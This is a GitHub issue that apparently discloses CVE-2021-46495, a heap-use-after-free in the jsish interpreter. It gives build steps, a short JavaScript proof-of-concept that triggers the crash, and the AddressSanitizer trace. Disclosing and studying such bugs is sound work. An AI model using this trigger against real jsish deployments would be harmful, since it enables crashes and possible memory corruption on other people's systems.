CVE-2021-46495: Heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue · Issue #82 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

function JSEtest() { var buf = setInterval(function () { ws.send(‘0’); }, 40)(update(Object(0))); }

try { JSEtest(); } catch (e) { setInterval(Function.prototype, 40); }

​

Execution steps & Output

$ ./jsish/jsish poc.js ==66060==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001f0 at pc 0x56055c54b6fc bp 0x7ffc737457e0 sp 0x7ffc737457d0 READ of size 4 at 0x6030000001f0 thread T0 #0 0x56055c54b6fb in DeleteTreeValue src/jsiObj.c:176 #1 0x56055c563384 in Jsi_TreeEntryDelete src/jsiTree.c:636 #2 0x56055c564f10 in destroy_node src/jsiTree.c:496 #3 0x56055c564f10 in destroy_node src/jsiTree.c:494 #4 0x56055c564f10 in Jsi_TreeDelete src/jsiTree.c:515 #5 0x56055c54d9df in Jsi_ObjFree src/jsiObj.c:348 #6 0x56055c54ea0f in Jsi_ObjDecrRefCount src/jsiObj.c:440 #7 0x56055c3fd3d1 in ValueFree src/jsiValue.c:178 #8 0x56055c3fd3d1 in Jsi_ValueFree src/jsiValue.c:199 #9 0x56055c3fd6cf in Jsi_DecrRefCount src/jsiValue.c:52 #10 0x56055c50d4d4 in Jsi_EventFree src/jsiCmds.c:204 #11 0x56055c4234e2 in freeEventTbl src/jsiInterp.c:570 #12 0x56055c4c58dd in Jsi_HashClear src/jsiHash.c:507 #13 0x56055c4c5cd7 in Jsi_HashDelete src/jsiHash.c:526 #14 0x56055c43687c in jsiInterpDelete src/jsiInterp.c:1936 #15 0x56055cc4d047 in jsi_main src/main.c:49 #16 0x7f78b6c29bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #17 0x56055c3dc969 in _start (/usr/local/bin/jsish+0xe8969)

0x6030000001f0 is located 0 bytes inside of 32-byte region [0x6030000001f0,0x603000000210) freed by thread T0 here: #0 0x7f78b78987a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x56055c3fd6cf in Jsi_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here: #0 0x7f78b7898d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x56055c44daa4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue Shadow bytes around the buggy address: 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd 0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa 0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd =>0x0c067fff8030: fa fa fd fd fd fd fa fa fd fd fd fd fa fa[fd]fd 0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd 0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa 0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==66060==ABORTING

1 participant